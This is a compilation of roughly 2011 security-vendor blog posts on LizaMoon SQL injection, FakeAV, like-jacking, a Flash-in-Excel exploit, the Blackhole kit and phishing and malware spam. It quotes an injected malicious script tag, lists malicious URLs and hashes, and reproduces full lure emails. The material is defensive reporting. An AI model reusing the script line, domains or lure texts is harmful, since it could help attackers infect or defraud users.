Computer Security Articles

Working in the security industry brings about a myriad of challenges. This is especially true for vendors. We must do our best to educate and inform. At the same time, we want to avoid laying on the FUD–or scaring customers into making poorly educated security decisions.

Which brings us to the recent LizaMoon attacks. There is an incredible amount of highly generic and vague information floating around. The fact of the matter is on-going SQL-injection attacks are a fact of life. They are not the only ones, either; every day there are mass spammings of new pieces of malware. Every week we see thousands of new “fake-alert” Trojans (a.k.a. rogue or bogus AV/security products and scams). And fake-alert is just one of the millions of static malware examples that we deal with on a constant basis.

So how should we respond? Do we toot our own horn and blast everyone with a gargantuan list of countermeasures for any and all threats? Do we wait and see how the industry reacts and then do what everyone else does?

Without getting too philosophical, I’ll cut to the chase.

What’s In a Name?

The LizaMoon attack is named after one of the domains referenced in the script code that gets injected into compromised pages.

Example: <script src=http://lizamoon[dot] com /ur[dot] php >

Lizamoon.com is not the only domain associated in this way. In the days since we started tracking this event, we have added many others. As of this writing we know of around 40 (give or take a few). If you are looking to block traffic to the malicious domains, this is where you want to focus your efforts. We have seen some recommendations to block all associated domains–even those that have been compromised (the valid sites that were victimized by the attack). This step may be overly paranoid. We do not necessarily need to block traffic to all these legitimate and well-meaning sites (by some estimates the count is up to 1.5 million) to protect against this and similar threats.

Make Me Feel Secure !

The injected scripts redirect clients to sites that are known to host fake/rogue/bogus security software. There are tens of thousands of write-ups on this fake-alert family on our Threat Intelligence site, and it’s one of the most prevalent families of static malware that we deal with.

The particular package associated with this attack is detected as follows:

Name: FakeAlert-PJ.gen.c
DAT: 6304
Release Date: April 2, 2011
Info: http://vil.nai.com/vil/content/v_348729.htm

Malicious hosts associated with this attack (for example, lizamoon.com) are categorized as malicious by our Web Reputation Service (http://mcaf.ee/92e06). Multiple McAfee products, at various layers of defense, use this intelligence to block traffic or filter out the bad stuff. McAfee Firewall Enterprise and McAfee Host Intrusion Prevention are just a few examples. More details on McAfee GTI Reputation and Categorization Services can be found here: http://mcaf.ee/92e06

The network side of the SQL-injection attack is detected through the McAfee Network Security Platform. The signatures that pick up this particular attack are approaching one year old (sig: HTTP: SQL Injection – evasion III in Releases 4.1.74, 5.1.44, and 6.1.11).

Where’s the Beef?

This is a SQL-injection attack. Before any of us blow our IT budgets on database security goodies, we must all take the basic first steps. Simple and core techniques, such as constraining user input, validating user input, limiting types of input, encrypting sensitive data, and designing accounts with the principle of least privilege will go a long, long way.

Alas, the news was published on April 1^st. But it is not a joke.

Curious, I spent a bit of time today researching it (when I really was supposed to be doing other things), and while the “lizamoon” url is down, there are still a number of other URLs active on this one.

Without a lot of effort, I found infections using other URLs, which include

t6ryt56.info/ur.php
tadygus.com/ur.php
milapop.com/ur.ph
books-loader.info/ur.php

(These are all malicious, so obviously don’t go to them unless you know what you’re doing, etc.)

However, I doubt the infection is as massive as is being stated. For unique sites, perhaps a few thousand. More pages than that, but in terms of unique domains, not a million, as might have been inferred from articles.  

What’s curious is I found something else that was interesting —  encoded View State with malicious URLs injected into the site.

For example, here’s a screenshot of an example encoded View State that I found on one of the injected sites.

First, an infected page (with VIPRE yelling away that there’s a problem in the corner — sorry, can’t help the shameless self-promotion).

So let’s take a look at the page source:

Yuck! What’s all that? It’s encoded View State.

So we go to a handy-dandy decoder, paste the offending text, do a little “where’s Waldo” and there you have it:

How cool is that?

And yes, that is really painfully sloppy stuff.

Alex Eckelbery
(Obligatory hat tip to Jose)

We’re currently monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV.

Based on Google searches, there is no common denominator in terms of the industry to which the compromised sites belong. We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others.

More URLs Involved

Investigations revealed that five URLs were used for the attack and were inserted into the compromised sites through SQL injection. The said URLs all resolve to a single IP server—a known malicious IP Trend Micro researchers are monitoring. Thus, the related URLs have been proactively blocked by Trend Micro as early as March 25, 2011:

• {BLOCKED}of-books.com/ur.php
• {BLOCKED}ane.com/ur.php
• {BLOCKED}carter.com/ur.php
• {BLOCKED}on.com/ur.php
• {BLOCKED}6.info/ur.php

New developments are currently being observed. We’re seeing compromised websites that were previously inserted with a script leading to {BLOCKED}on.com/ur.php already modified to connect to {BLOCKED}s.com/ur.php. The said URL also resolves to the same IP server as the four previously mentioned URLs. It is possible that the cybercriminal behind this attack is updating the compromised sites with new URLs to connect to since the previous ones are already being blocked.

Infection Chain Leads to FAKEAV and WORID

So far, the infection chain has been typical. Visiting a compromised website with the malicious script leads to any of the above-mentioned URLs, which then triggers a series of redirections, finally leading to the download of malicious files. The redirections are visible to the user, as the displayed pages show a fake antivirus scan. The scan is, of course, fake, and is the first part of the whole FAKEAV scam, followed by a prompt to download a malicious file disguised as an installer.

Retrieved samples from active instances are now detected as TROJ_FAKEAV.BBK and TROJ_WORID.A.

Web compromises such as this one are not uncommon but do pose a great threat, especially if a particular website with high incoming traffic is among those compromised. Trend Micro, through the Smart Protection Network™ protects users from being affected by this compromise, as the related malicious URLs are already blocked and the malicious files detected.

Website owners who suspect that their websites have been compromised are advised to clean up their sites as soon as possible.

Post from: TrendLabs | Malware Blog – by Trend Micro

LizaMoon, Etc. SQL Injection Attack Still Ongoing

The mere mention of anything with a sex connotation on Facebook almost always begets some major activity, with people wanting to know more. As a result, whatever the attack vector or channel might be is propagated, and the attacker is sure to get some response.

In this example a Facebook click-jacking attack jumped on the bandwagon of Italian model Marika Fruscio's unfortunate incident with a wardrobe malfunction on live TV.  The title of the scam on Facebook was "The beautiful Marika Fruscio shows her breasts on Italian TV!", which almost sounds like it was staged as opposed to an accident.  Whatever the theory, the interesting part of this attack is what happens when someone clicks on the provided link to watch the embedded video.

The example seems harmless as upon clicking the link, the user is directed to another page where they can view the video.  While this is happening, the user's account is being exploited to post the video on their homepage to distribute.  The user is also added to the list of those who like the video, consequently encouraging others to view this.  The series of steps involved is shown below.

An infected account shows the advert as being liked either by a friend or contact within your Facebook account:

The user is then directed to the page below to view the video.  Unknown to the user, there are hidden elements and iframes within the HTML code, located at the Play button, which directly access the user's 'like' option within Facebook .  These hidden elements are where the magic of click-jacking, or shall we say like-jacking, happens.

Innocent-looking page as seen by the user:

Riddled page with hidden elements and iframe superimposed on the Play button and various parts of the page:

On clicking the Play button, two events take place. The first is that the user's Facebook account accepts 'liking' the video, with the video being posted on their wall as a result. The second is that the video plays Marika Fruscio's wardrobe malfunction on live TV. 

Below is the screen the user is presented with if they are not already logged in to Facebook:

The compromised account then displays a video link on the user's wall encouraging others to view this. 

There are several reasons for this type of attack and in this instance although there is nothing apparently malicious, it brings to mind the elaborate ploy where an attacker uses this means to earn some money.  Pay-per-click springs to mind, as attackers for these scams usually get the user to click on hidden links in order to get many hits, which then rewards the attacker with money.

Further analysis using our in-house tools on spontour.net shows the various links and how they are interconnected.

To protect yourself from attacks such as these, and also from posts like this being posted on your wall, try our free Defensio Facebook app.

Attackers have been taking advantage of the situation in Japan to trick their targets into opening malicious files. These cases have used infected Excel attachments with Flash exploits.

Here’s a screenshot of one such e-mail, provided by Contagio:

The related XLS samples have these hashes:

4bb64c1da2f73da11f331a96d55d63e2
4031049fe402e8ba587583c08a25221a
d8aefd8e3c96a56123cd5f07192b7369
7ca4ab177f480503653702b33366111f

We detect them as Exploit.CVE-2011-0609.A and Exploit:W32/XcelDrop.F.

Another sample we’ve seen (md5:20ee090487ce1a670c192f9ac18c9d18) is an Excel file containing an embedded Flash object that exploits a known vulnerability (CVE-2011-0609). When the XLS file is opened, it shows an empty Excel spreadsheet and starts exploit code via a Flash object.

The Flash object starts by doing a heap-spray containing the following shellcode:

This first shellcode only loads and passes execution to a second shellcode embedded in the Excel file:

The second shellcode is responsible for decrypting and executing an EXE file (also embedded in the Excel file):

In the meantime, the Flash object constructs and loads a second Flash object in runtime:

This second Flash object is the main exploit in this malware and it exploits CVE-2011-0609 to execute the shellcode in the heap. We generically detect the Flash object as Exploit.CVE-2011-0609.A.

As an aside: the main exploit appears to have been delivered in this fashion in an attempt to evade detection. As it is loaded in memory, no physical file is available for scanning by an antivirus engine. Embedding the Flash object that loads the main exploit in an Excel file may be an attempt to further disguise the attack.

Fortunately, the malicious Excel file and its embedded EXE file are detected as Exploit.D-Encrypted.Gen and Trojan.Agent.ARKJ, respectively.

Still, users should update their Flash player as Adobe has already released a patch for this particular vulnerability. For more information, please see their security advisory for CVE-2011-0609.

Threat Solutions post by — Broderick

On 23/03/11 At 02:55 AM

Earlier today, we found a phishing site that poses as a donation site to raise money for the victims of the recent earthquake in Japan. The phishing site http://www.japan{BLOCKED}.com is created by using an open-source social networking system Jcow 4.2.1. It is hosted on the IP address 50.61.{BLOCKED}.{BLOCKED}, which is located in the United States. We’ve confirmed that the site is still active as of this writing.

Aside from hosting a phishing site, the cybercriminals behind this attack also abused the blog function of the website and inserted advertisement-looking posts, possibly to increase the site’s SEO ranking.

Such attacks are not uncommon as we’ve previously documented instances of attacks that leveraged natural disasters such as Hurricane Katrina in 2005, Hurricane Gustav in 2008, Chinese Sichuan earthquake in 2008, the latest attack used the Haiti earthquake in 2010.

Users should remember to choose trustworthy organizations when it comes to handing over their donations.

The Trend Micro™ Smart Protection Network™, through the Web reputation technology already blocks access to this phishing site even if a user is duped into clicking its link.

Post from: TrendLabs | Malware Blog – by Trend Micro

Phishing Attack Uses Fake Donation Website

It is with great joy that I announce the next two live Anatomy of an Attack events we will be delivering in Dallas, TX and Louisville, KY.

What is Anatomy of an Attack? It’s a half-day seminar where I present a complete look inside the malware economy. I explain the what, who, how and why driving this crazy cat-and-mouse game.

In addition to sharing the stories behind the latest and most notorious attacks and the personalities behind them, I also demonstrate some live malware to show the methods being used by our adversaries.

Of course we don’t leave you hanging. I provide tips on how to take advantage of free tools and your existing investment in security software to defend yourself against the majority of attacks that I cover in the seminar.

If you live in Dallas, please register and join us on Wednesday, March 2nd at the Dallas Marriott City Center.

Those of you in Louisville can register to attend our event at the Seelbach Hilton on Wednesday, March 9th.

I sincerely look forward to meeting those who are able to attend. For those of you elsewhere in the world, check our list of upcoming events or watch our educational videos that show a sample of the content we present.

Last year, I wrote several Naked Security articles about computer security problems which can put travellers in harms’ way. The topics I covered were:

* The free WiFi service at San Francisco airport with Terms and Conditions which authorised the network operator to access your device and the information stored on it.

* The no-responsibility-for-your-property attitude of the private security company at Canberra airport – a company which nevertheless insists on separating you from your laptop for an indeterminate amount of time during screening.

* The chap at Sydney airport who used a kiosk computer in the the Qantas lounge and left behind a veritable audit trail of personal email information – including his name, employer, job and details of recent business meetings.

* Paul Craig’s live demonstration at Kiwicon of the woeful insecurity of many internet kiosks, even if you avoid the self-inflicted data leakage problems of the previous story by clearing browser history and logging out when you’re finished.

I’m now on my way back from the RSA conference in San Francisco – where I can tell you that the WiFi Terms and Conditions at the airport are still as onerous as they were last year – with an amusing fifth anecdote to add to my Travellers Beware series.

The crumpled-up PostIt note you see above was dropped in the lobby of one of the big hotels near the Moscone Center, the outsized conference venue near Union Square at which the RSA event is held.

The note doesn’t record the name of the person whose BlackBerry Enterprise Server connection it relates to. But conference delegates have a habit of leaving their nametags on, even back at the hotel. This seems to be a subcultural nicety of the conference circuit.

So you can often tie discarded data fragments – such as the pictured PostIt – back to a company, and in many cases, to an individual. (It’s not even rude if you’re caught trying to make out someone’s nametag across the lobby. That’s what nametags are for, after all.)

Making that sort of connection converts raw data into PII, or Personally Identifiable Information. And PII really needs to be kept private.

Don’t let yourself fall into bad data leakage habits whilst you’re on the road. And data doesn’t just leak from electronic devices such as laptops and phones. Hastily scribbled notes, memos to yourself and carelessly discarded invoices and tickets can help identity thieves to accumulate PII which they can abuse or sell on at a later stage.

And please choose decent passwords. If you’re a sysadmin, don’t fall into the habit of choosing trivial passwords because they’re easier to read out to users when they’re on the road. (As an aside, teach yourself and your fellow administrators the NATO Phonetic Alphabet and you’ll find it much easier to describe arcane command lines and to read out complex passwords.)

The password in the pictured example is especially amusing. It brings a whole new excitement to the concept of a dictionary attack, since a (and not aardvark, as popularly imagined) is always the very first entry in any dictionary of the English language.

Watch how to choose a decent password here:

_{(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like.)}

If you’re concerned about privacy – your own and that of your valued customers – why not download our free Data Security toolkit?

Apologies to our readers from me and from Chester Wisniewski – we haven’t written anything for Naked Security for the past week or so.

That’s because we’ve been off the air, and on our feet, for the past few days, attending the RSA 2011 conference in San Francisco.

Actually, we haven’t been attending the conference. We’ve been on the Sophos booth at the RSA Expo which happens alongside the conference – and mere exhibitors aren’t allowed into the conference sessions. Not that we’d have been able to attend anyway, because the booth has been really busy.

Chester and I have been giving presentations on a regular and frequent basis: a Live Malware Attack from me, showing how JavaScript-borne malware sneaks into your network, and The Money Behind the Malware from Chester, explaining why cybercrooks put so much effort into their criminal activities.

The presentations were a big hit – some kind participants even went so far as to say they’d enjoyed them more than the papers they’d heard in the conference proper! – and gathered big crowds.

In fact, we heard through the grapevine that we may have been too successful, overflowing our booth into the aisles. (Apparently, it’s also dangerous to throw T-shirts to the audience lest the sharp edges cause injury. Sorry about that.)

But the really great moment came yesterday evening, when Chester and I went to the RSA 2011 Security Bloggers meetup. We’d been shortlisted for two awards; we were both surprised and delighted to walk away as the Most Educational Security Blog for 2011.

Of course, a large part of our ability to be educational on Naked Security is down to you, our readers.

We receive an astonishing range of suggestions, corrections, updates, alerts and useful advice via the Naked Security email address tips@sophos.com.

We really value your comments – thanks, and keep them coming!

Oh, and please take a listen to this week’s Sophos Security Chet Chat – Chester’s excellent weekly podcast, now in its 48th week – which was recorded live on the show floor at RSA. Share with us in some of the weirder and more wonderful aspects of the event.

There seems to be a rather nasty spamrun taking place on many .edu sites hosting forums at the moment. Filtering out lurid trackback spam and genuine .Edu articles about pornography in various search engines reveals pages and pages of forum spam, dubious keywords and sites that currently look like this:

Click to Enlarge

As you can imagine, the shot above is one of the tamer spamruns.

Elsewhere, you have the kind of pages that induce headaches for bloggers hovering their fingers over the “blank this out” key:

Click to Enlarge

Notice that 45 people have hit the “Like” button – I’m hoping those are spam accounts and not regular forum users.

Most of this seems to have kicked in since around the 4^th or 5^th of February, and there doesn’t seem to be much in the way of spam control or preventative measures going on right now so please be careful if looking around your University forums, official or otherwise. While not everything in the below screenshot is related to this spamrun, it should give you an idea of the kinds of things in circulation:

Click to Enlarge

The sites currently being targeted desperately need to take control of the situation – if things continue as they are, I can’t imagine many users being persuaded to stick around…

Christopher Boyd

We’re seeing a widespread malware attack in our spam traps this morning – and what’s making it unusual is that it appears not to be able to decide what it is.

When you first see the subject line, you imagine it’s going to be another “undelivered parcel” attack:

United Parcel Service notification #49674

(the tracking number changes in each email)

And the fact that it uses an @ups.com email address doesn’t do anything to make you think it won’t be another addition to the long line of malware attacks that are spammed out pretending to come from the likes of UPS, FedEx or DHL.

Things get a little weird, however, when you look at the email’s content.

The message, embedded as an image inside the email, claims to come from the Federal Deposit Insurance Corporation (FDIC).

It claims that there are “important changes in current regulations of endowment insurance procedure” that you should look through, and is signed – with “best regards” from the “Federal Deposit Insurance Corporation Investors Relations Department”.

What a strange email!

On one hand it claims to be from UPS about a delivery, and with a split personality it then claims to be a message from FDIC! The attached file appears to keep up the pretence of being FDIC-related – it’s called FDIC_Document.zip.

Beware opening the ZIP file, however. It contains a malicious file called FDIC_Document.exe. Sophos is adding detection of the malware as Troj/Bredo-FA.

This malicious spam campaign is widespread right now, hitting inboxes around the world. Hopefully the cybercriminal’s botched job will stop some people opening the attachment as it’s subject line and ‘from’ address is clearly so out of kilter with its email body.

But no doubt there are some folks who will be so puzzled by this email’s split personality that they’ll investigate the attached file, and end up with an infected Windows computer.

Recently, we have seen an increase in Blackhole exploit kit attacks. Blackhole is yet another web exploit kit developed by Russian hackers. According to one forum, the author indicates that the kit will cost $ 1,500 annually, $ 1,000 for a half-year and $ 700 for 3 months. It is a very powerful kit with a number of recent exploits including Java and Adobe PDF exploits. The attacker has continually improved the kit with more obfuscation and crypto algorithms to avoid the detection by AV vendors. One of the lines from description of the kit says it all – “Exploits crypt on special algorithms that make it impossible to code analysis and detection of anti-virus as well as services,Tipo wepawet and other counterparts …”. Analysis of this malicious toolkit showed that URL patterns remain the same for most of the malicious domains hosting the Blackhole exploit kit. A Google search for the URL patterns returns thousands of results for such domains and Google does generally flag them as malicious domains. Here is the screenshot of Google search:

The exploit kit sends heavily obfuscated JavaScript code with Java applet code, which will download a malicious JAR file to the system. Here is what the code looks like:

The above JavaScript code is formatted for better viewing. It is heavily obfuscated to avoid antivirus detection. If we decode the content, we see that the kit is targeting a recent vulnerability in Java. The VirusTotal result for above “.jar” file is very poor with only 2 antivirus engines triggering on it. Here is the decoded part of the script,

The above decoded JavaScript targets CVE-2009-1671. It will download a malicious binary called “info.exe” from the server and execute it on the system. The VirusTotal result for this file remains poor at only 47%. There is also another Iframe attack in the decoded JavaScript code.

The above code will append the malicious Iframe to the body of the webpage, which points to another malicious URL. The above malicious URL contains yet another malicious URL in an ASX file format. This is intentionally done to avoid a user prompt. Here is the source,

This URL then sends more obfuscated JavaScript code exactly like the second image of the blog. Once decoded it shows JavaScript code which targets CVE-2010-1885. Here is the decoded script,

We have seen many similar web exploits kits in the past and attackers are coming up with new ones like Blackhole with more features and reliable and undetectable exploits all the time. We are also seeing large number of malicious domains hosting Blackhole exploits kit. The detection ratio is generally very poor for malicious binaries contained in the kits. Even though the price of this exploit kit is high, it remains a sought after commodity.

Umesh

Sophos is intercepting a malicious spam attack, which attempts to infect recipient’s computers with a Trojan horse by pretending to contain images of the Scandinavian sender.

Here is what a typical malicious email looks like:

Subject: Hei Man,
From: "Facebook"<info@hi5.com>
Attached file: Image123.zip

Message body:
Hei Man,

Jeg vet ikke hvordan jeg skal si det, men jeg har prшvde fшr en lang tid til е sende deg noen bilder, men jeg har tenkt at du ikke er interessert i е se meg.
Men nе skal jeg sende deg bilder i vedlegg.
Last ned bilder og trekke ut de, er jeg sikker pе at du vil like de. Passordet er: 123456

Ha en flott dag.

The message, which appears to be written in Norwegian, roughly translates to:

Hey Man,

I do not know how to say it, but I have tried for a long time to send you some pictures, but I've been thinking that you are not interested in seeing me.
But now I'll send you pictures in the attachment.
Download the images and extract them, I'm sure that you will like them. The password is: 123456

Have a great day.

The attached file, named Image123.zip, is encrypted – presumably in an attempt to avoid detection by weaker anti-virus products – but the email message contains the password to unlock the ZIP and reveal the malware to you.

Of course, an attack like this is only likely to trick users who speak Norwegian (or its close linguistic neighbour Danish), but you can imagine how a message claiming to come from a Facebook or Hi5 friend might trick some people into checking out what hides behind the ZIP without thinking.

Sophos detects the Trojan horse proactively as Mal/Behav-043 and is adding detection of the ZIP file as Troj/BredoZp-BU.

The Criminal Behind the Attack

James McQuaid

What does this code do?

Any Internet user who pointed their browser at the site would have the bad code downloaded and run inside their Internet Explorer or other web browser. The web browser would run this code just like all the other “good” code that shows us the text, images and links that make up the web page we’re viewing. The bad code is smart. It pulls down more code from various places, jumping from China to the Ukraine and back to China. It’s pretty tough for the good guys to track down the bad guys with that kind of world-hopping behavior. Here’s a simple view:

During Step 3, the code tries to infect our computer, betting on the fact that our Windows software is not up to date like Microsoft warns here, or we have not updated our Adobe PDF viewer like Adobe warns here and here. In spite of these warnings from software vendors, an alarming percentage of computers remain out-of-date and vulnerable to infection.

The code in Step 3 is identified on http://www.virustotal.com/ as the (variously named) Zbot Trojan. The trojan installs a keylogger, steals sensitive data and enables fraudulent banking transactions. One thing to note in the following screenshot is that only some antivirus products detect the infection. If you were running Trend Micro or McAfee when you visited the site you would not have been protected.

http://www.virustotal.com/ analysis of the infection

So the upshot of the above is: simply browsing to the credit union website can get you infected with a trojan that steals your money.

How did the code get there?

It’s likely that the company managing the website did not keep the operating system, database, web server or other software up-to-date, allowing criminals to gain administrative access to the server and insert the bad code. They need to make sure the servers are up-to-date with the latest patches from Microsoft and the other vendors, just like we need to do with our own computers.

Happy Ending?

The malicious code has been removed from the banking website we are profiling here. That doesn’t mean it won’t be back. Authentium continues to scan banking and shopping websites to make sure that users of our SafeCentral secure browsing service are as protected as possible. SafeCentral is designed to provide safe web transactions even if you’ve been unlucky enough to visit a website that has infected your computer.

Twitter has been dealing with a denial of service attack this morning that has resulted in millions of users not receiving or posting tweets.

These days denial of service attacks typically are launched from botnets–large numbers of consumer PCs that have been infected with Trojans that wait to do the bidding of the “bot-herders” who manage them. The users of these machines may not know anything is wrong other than, “Gee, the Internet seems slow today.” Their Internet is slow because their computer is sending lots of traffic to the targeted site, in this case twitter.com. The bot-herders collect infected machines and then rent them out. Twitter is such a high profile site, it may be just a bot-herder or one of their customers wanting to show off the power of their bot net.

Is your computer a member of one of these botnets? It’s not easy for the average Internet user to find out. Seeing rapidly blinking lights on your cable modem even if you aren’t using your computer may suggest something is going on. But it could just be an updater downloading a new Firefox or operating system patch.

You may not be too worried about the state of Twitter. But you should Know that botnets can be told to do many things. They can be instructed, for example, to download keyloggers or other data stealing malware. The stolen data is then shipped off to collection servers where the bad guys can then use your bank username and password to steal money.

Keep your antivirus up to date and perform a full scan if you’re a little concerned.

Download and use SafeCentral if you want to bank and shop without the worry. SafeCentral users talk about this stuff here: community.safecentral.com.

Update:

It may be coincidental, but we saw a large increase yesterday in our virus-collection network. We received 200 times the normal average of emails with malicious attachments. One node, for example, went from 10 items to 2000 in a day. These were phony emails telling random recipients that a UPS parcel could not be delivered and asking the reader to “print out the attached invoice”. The attachment was not an invoice, it was a trojan.

Example of the email. Do not open the attachments in these emails if you get one!

Adobe’s Reader X, last year’s upgrade that features a “sandbox” designed to protect users from PDF exploits, stymied a recent attack campaign, researchers said.

Full story: Network World on Security

We are monitoring a phishing attack directed toward the customers of PayPal Italy. The email is very long and explains the reader why is it important to click on that link and to answer to the survey. As usual for this kind of emails, the subject specifies that the user is required to take action immediately.

Another interesting fact with this phishing attack is that the email appears to be sent from paypal.lt (Lituania). Checking the paypal.lt domain in a browser, we are redirected to the paypal.com website and then to the final target http://www-paypal-deutschland.de. These guys from PayPal seem to never learn anything from experience. As long as you have more than one domain for a business, you create confusion and practically invite fraudsters to take advantage of the confusion this creates.

The fake PayPal website looks different than the real paypal.it website (on paypal.it/ricarica), which might be because the screenshot was taken at a different point in time.

We would like remind our readers to never click on links in (unexpected) emails. If you have to visit a webshop or website of a financial institution, please make sure you type the URL by hand and not by clicking links in some email!

Sorin Mustaca
Data Security Expert

Full story: Avira – TechBlog

Yesterday, the UK foreign secretary, William Hague, explained to a security conference in Munich how cyber criminals were trying to infiltrate the UK government and defense contractors.

According to a BBC report, Mr. Hague explained that attackers had infected government computers with the Zeus trojan (Sophos calls Zeus “Zbot”) in attacks similar to those on the Department of Homeland Security last June.

While I commend the government for publicly addressing these issues, I certainly hope this isn’t news to those in the MoD (Ministry of Defence) or defense industries.

The types of threats Mr. Hague outlined are not just hitting the UK government. These types of malware, social engineering and targeted phishing are gaining momentum against businesses all over the planet.

Most of the examples he cited began as email attacks. While best practices suggest that you should block all executable content from entering your mail gateways, booby-trapped documents are still a risk.

Spend some time educating your users that Microsoft Office documents, PDFs and other commonly used file types can be dangerous. If you are not expecting a document, or if you find it out of context, don’t open it.

Phone the person who appears to have sent it or use some other out-of-band communications method to confirm the document isn’t phony.

For more information on how malicious PDF documents can be used to compromise your computers, check out “Finding rules for heuristic detection of malicious PDFs: With analysis of embedded exploit code”, the paper that Paul Baccas from SophosLabs presented at the Virus Bulletin 2010 conference.

Creative Commons photo of William Hague courtesy of Drown’s Flickr photostream.

Full story: Naked Security – Sophos

Cybercriminals are attempting to infect computers around the world, disguising their attack as an email claiming to come from United Parcel Service about a parcel delivery.

But this time they’re not using words, they’re using an embedded image to trick you into clicking on the link.

Here’s what a typical malicious email being used in this malware campaign looks like:

Subject: United Parcel Service notification #<random number>

Attached file: USPS_Document.zip

Message body:
Dear customer.

The parcel was sent to your home address.
And it will arrive within 3 business days.

More information and the tracking number are attached in the document below.

Thank you.
United Parcel Service.

Copyright (c) 1994-2011 United Parcel Service of America, Inc. All rights reserved.

As you can see – it looks pretty professional. Which may well fool more people into believing it is genuine.

What’s interesting is that there is no actual text inside the email’s message body, instead it consists solely of an image – presumably with the intention of attempting to slip past the more rudimentary anti-spam filters.

Attached to the email is a file called USPS_Document.zip, which contains the malware attack. Sophos detects the ZIP file proactively as Mal/BredoZp-B and the enclosed file as the Troj/Agent-QGH Trojan horse.

The malware is only capable of infecting computers running Windows.

If you are one of the many people seeing this malware attack in your email this morning, please do not click on the attachment even if you are waiting for a package to be delivered. Instead, simply delete the email and your computer will be safe.

This latest attack follows hard on the heels of another widespread assault on users’ inboxes which began to strike earlier this week, posing as a message from Post Express Service.

Full story: Naked Security – Sophos

During the course of 2009, the amount of publicly available information on the security of GSM cellular networks and devices has steadily increased. GSM stands for the “Global System for Mobile communications” and is the world’s most popular standard for mobile handsets.

View full post on SecureWorks Research Blog

Sophos — Be on your guard against the latest “undelivered package” malware attack that cybercriminals are spamming out right now.

Regular readers of Naked Security will be all too familiar with emails claiming to come from the likes of FedEx, UPS and DHL which pretend to be about a parcel that wasn’t delivered properly (and all you have to do is click on the attachment to learn more become infected.)

Now we’re seeing malicious emails which pretend to come from “Post Express Service”. Here’s a typical example:

Subject: Post Express Service. Get the parcel NR<random number>

Message body:
Dear client.

Your package has been returned to the Post Express office.
The reason of the return is "Error in the delivery address"

Attached to the letter mailing label contains the details of the package delivery.
You have to print mailing label, and come in the Post Express office in order to receive the packages.

Thank you.
Post Express Support

Attached file: Post_Express_Label_<random number>.zip

Other subject lines used in the attack include:

Post Express Service. Number of your parcel <random number>
Post Express Service. Package is available for pickup! NR<random number>
Post Express Service. Delivery refuse! NR<random number>

Hopefully you and the users inside your company won’t be so excited about the thought of an unexpected parcel that they open the attached file, as doing so will infect your Windows computer with malware.

Sophos detects the ZIP file as Troj/BredoZp-BT and the enclosed malware as Troj/Spyeye-R.

Remember, there’s only one reason why cybercriminals keep using this type of social engineering to fool users into running malware – it works.

.

If you got a suspicious email, you can forward it to us [malware@computersecurityarticles.info], or you also able to submit the malicious file via “Virus Submit“.

We are currently observing an attack with different phishing emails and websites, targeting the customers of the Italian bank Cartasi.

We have spotted 4 different phishing attacks, 3 of them using the classical technique of faking the target URL (pictures 1-3) and one using social engineering techniques (Picture 4). The last one, is tempting the user to access his/her account in order to receive a 150 EUR fidelity bonus. So that the effect is realistic, the sense of urgency is created by mentioning the email that the account has to be accessed in 48 hours from receiving the email.

All emails we received are being sent from bots around the world, containing also some fake headers.

As usual, we would like to assure our readers that nothing is really free in the Internet and that banks (should) never send emails asking the users to do something that could identify them. The emails are all detected by Avira Antispam as Phishing and all URLs are blocked.

Sorin Mustaca
Data Security Expert

Full story: Avira – TechBlog

Phishing attacks have grown steadily in recent years, becoming a highly profitable attack for cyber criminals. In ESET Latin America’s Laboratory, we are used to finding and informing about phishing attack outbreaks in our region. A few days ago, we found a new case of phishing, for which we investigated the effectiveness of the attack.
In … Read More.

Full story: ESET ThreatBlog